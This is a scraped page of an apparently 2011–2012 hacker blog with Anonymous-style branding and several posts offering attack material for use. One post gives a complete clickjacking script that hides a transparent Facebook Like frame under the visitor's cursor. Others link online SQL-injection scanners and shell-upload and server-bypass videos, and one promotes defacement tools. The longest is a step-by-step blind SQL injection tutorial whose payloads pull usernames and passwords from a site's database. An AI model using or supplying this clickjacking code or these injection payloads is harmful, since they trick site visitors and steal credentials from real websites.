Anonymous Hackers

We are Anonymous. We are legion. We do not forgive. We do not forget. Expect us.

Anonymous Hackers

The BackTrack

Penetration Testing and Security Auditing Linux Distribution

The BackTrack

WANK

You talk of times of peace for all, and then prepare for war

WANK

Mantra Security Toolkit

Free and Open Source Browser based Security Framework

Mantra Security Toolkit

Hacker

A person who uses computers to gain unauthorized access to data

Hacker

Def4z3r

I'm still here, waiting here, to catch you if you fall

Def4z3r

Cyber War

Cyberwarfare refers to politically motivated hacking to conduct sabotage and espionage

Cyber War
  • Reiciendis voluptatibus maiores
  • Asumenda omnis dolor
  • WANK sint
  • Necessitatibus saepe eveniet
  • Omnis dolor repellendus
  • Pomnis voluptas assumenda
  • Harum quidem rerum

Sunday, January 1, 2012

Facebook Auto Like Script reCODE BY Def4z3r

 
This script is freely available on the internet yet...!

1:  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
2:  <html xmlns="http://www.w3.org/1999/xhtml">  
3:  <head>  
4:  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
5:  <title>Facebook Auto Like Script reCODE BY Def4z3r</title>  
6:  <script src="jquery-1.4.2.min.js" type="text/javascript"></script>  
7:  <script type="text/javascript">  
8:  var interval;  
9:      $(function()  
10:  {  
11:    interval=setInterval("updateActiveElement();", 50);  
12:  });  
13:  function updateActiveElement()  
14:  {  
15:    if ( $(document.activeElement).attr('id')=="fbframe" )   
16:    {  
17:      clearInterval(interval);  
18:      iflag=1;   
19:    }    
20:  }  
21:      </script>  
22:  </head>  
23:  <body>  
24:  <!--page content goes here--> <center>  
25:  <h2>Hey Dude Please click anywhere on the page.</h2>  
26:   <p>Now check your facebook wall :-P </p>  
27:  . <img src="http://animateddesktopbackground.com/wp-content/uploads/2011/12/2012-happy-new-year-background-wallpaper-640x490.jpg" />  
28:     <!-- end of page content (but don't close your html or body tag here)-->  
29:  <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">  
30:  <!--facebook like frame code goes here-->  
31:       <iframe src="http://www.facebook.com/plugins/like.php?href=http://lh4d.blogspot.com/&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>  
32:     <!--end facebook like frame code-->  
33:    </div>  
34:     <script>  
35:    var iflag = 0;  
36:    var icontainer = document.getElementById('icontainer');    
37:    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes  
38:    function mouseFollower(e){  
39:      /*          DO NOT EDIT THIS             */  
40:    if (window.event)   
41:    { // for IE  
42:      icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';  
43:      icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';  
44:    }   
45:    else   
46:    {  
47:      icontainer.style.top = (e.pageY-5)+'px';  
48:      icontainer.style.left = (e.pageX-5)+'px';  
49:    }  
50:    }  
51:    document.onmousemove = function(e) {  
52:      if (iflag == 0) {mouseFollower(e);}  
53:    }  
54:    </script>  
55:  </body>  
56:  </html>

Posted by Agent BG4 12 comments 6:05 AM
Labels: , ,

Friday, November 18, 2011

Online SQLi scannerz

 

  1. http://www.vhcteam.pro/t00ls/h4ck-sh0p/bing/ BY VHC TEAM
  2. http://coderboyz.com/scanner/scanner/ BY Raja.The indian Coder
  3. http://www.oncz.info/tools/hack/bing-dork/index.php BY fLaSh.cReW -- Copy left by FlashCrew.In
  4. http://karyaputra.com/data/jal/dut/index.php  BY revres .tanur
 
  
 
Posted by Agent BG4 0 comments 9:49 PM
Labels: ,

Saturday, October 15, 2011

KhantastiC haXorZ Hacking VDOZ



Uploading Shell Via Tamper Data


Bypassing Server via Symlink [TUTORIAL] .


Uploading Shell Via Tamper Data By Khantastic

*** VIDEO INFO ***
Input Type : mkv
Input Size : 1280 x 720
Output Type : MKV
Output Size : 1280 x 720
FrameRate(Frame/sec) : 0.00 (15.00)


*** AUDIO INFO ***
SampleRate(Sample/sec) : 44100
BitRate(Bit/sample) : 16
Channels : 2
KBitRate(KBit/sec) : 1411


------------------------------------------------

Bypassing Server via Symlink bY KhantastiC haXor

*** VIDEO INFO ***
Input Type : Bypassing Server via Symlink bY KhantastiC haXor
Input Size : 1280 x 720
Output Type : MKV
Output Size : 1280 x 720
FrameRate(Frame/sec) : 0.00 (15.00)


*** AUDIO INFO ***
SampleRate(Sample/sec) : 44100
BitRate(Bit/sample) : 16
Channels : 2
KBitRate(KBit/sec) : 1411


DOWNLOAD YOUR FILE !

Posted by Agent BG4 0 comments 11:07 PM
Labels: , , ,

Thursday, September 1, 2011

Nokia Screen Dumper (NSD) v.2.0

With this small program for owners of Nokia phones Nokia, running on a platform of S40, it will be possible to make screens with screens of their favorites. It does not have the Russian language, but it does not become an obstacle, because the interface is intuitive. Just connect your phone to your computer and click the 'Dump', and then, if necessary, to keep the resulting screen, pressing the 'Save dump'. The archive contains notes and hints eksplautatsii Nokia Screen Dumper.

(260 kb) .zip file

DOWNLOAD YOUR FILE !
Posted by Agent BG4 0 comments 5:31 AM
Labels: ,

Thursday, August 11, 2011

Top Website Defacing Toolz





Want to deface a website this is the tools you need






Posted by Agent BG4 0 comments 6:18 AM
Labels:

Wednesday, August 10, 2011

Blind Sql Injection text and video tutorial by t3rm!n4t0r N k1ll3ra





The above we discussed comes under Error based sql injection. Let us the
discuss the harder part i.e. Blind sql injection.
We use our example: 
http://www.site.com/news.php?id=7
Let’s test it:


http://www.site.com/news.php?id=7 and 1=1 <--- this is always true and the
page loads normally, that's ok.
http://www.site.com/news.php?id=7 and 1=2 <--- this is false, so if some
text, picture or some content is missing on returned page then that site is


vulnerable to blind sql injection. ☺


GETTING MySQL VERSION


To get the MySQL version in blind attack we use substring:
http://www.site.com/news.php?id=7 and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5,
and if query return TRUE then the version is 5.


CHECKING FOR SUBSELECT


When select don't work then we use subselect:
http://www.site.com/news.php?id=7 and (select 1)=1
If page loads normally then subselect work, then we are going to see if we
have access to mysql.user:
http://www.site.com/news.php?id=7 and (select 1 from mysql.user limit
0,1)=1
If page loads normally we have access to mysql.user and then later we can
pull some password using load_file() function and OUTFILE.


CHECKING FOR TABLE AND COLUMN NAME


Here luck and guessing works more than anything ☺
http://www.site.com/news.php?id=7 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns
only 1 row, this is very important.)
Then if the page loads normally without content missing, the table users
exits. If you get FALSE (some article missing), just change table name until
you guess the right one.


Let’s say that we have found that table name is users, now what we need is
column name. The same as table name, we start guessing. Like i said before
try the common names for columns:
http://www.site.com/news.php?id=5 and (select
substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that column name is password (if we get
false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1)


PULL DATA FROM DATABASE


We found table users i columns username password so we gonna pull
characters from that. Like:
http://www.site.com/news.php?id=7 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>80
Ok this here pulls the first character from first user in table users. Substring
here returns first character and 1 character in length. ascii() converts that 1
character into ascii value and then compare it with symbol greater then > .So
if the ascii char greater then 80, the page loads normally. (TRUE) we keep
trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using the ascii converter we
know that char(99) is letter 'c'.
So keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are lots of tools available for blind sql injection and can be used as
people don’t like manual work because blind sql injection take out your
whole patience ☺


Blind Sql Injection VIDEO TUTZ By k1ll3ra.rar 5.6MB (Archive)



HTML tutorial
Posted by Agent BG4 0 comments 2:36 AM
Labels: ,
Subscribe to: Posts (Atom)